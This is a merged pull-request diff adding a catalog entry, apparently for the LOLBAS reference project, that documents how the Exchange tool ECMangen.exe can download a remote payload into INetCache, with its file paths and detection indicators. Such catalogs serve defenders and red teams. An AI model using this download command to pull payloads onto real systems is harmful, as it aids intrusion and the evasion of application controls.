Skip to content
Merged
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
28 changes: 28 additions & 0 deletions yml/OtherMSBinaries/ECMangen.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
---
Name: ECMangen.exe
Description: Command-line tool for managing certificates in Microsoft Exchange Server.
Author: Avihay Eldad
Created: 2024-04-30
Commands:
- Command: ECMangen.exe {REMOTEURL}
Description: Downloads payload from remote server
Usecase: It will download a remote payload and place it in INetCache
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\ECMangen.exe
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\<version>\Bin\x64\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\<version>\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\Bin\ECMangen.exe
- Path: C:\Program Files\Microsoft\Exchange Server\ClientAccess\Bin\ECMangen.exe
- Path: C:\ExchangeServer\Bin\ECMangen.exe
Detection:
- IOC: URL on a ECMangen command line
- IOC: ECMangen making unexpected network connections or DNS requests
Acknowledgement:
- Person: Avihay Eldad
Handle: '@AvihayEldad'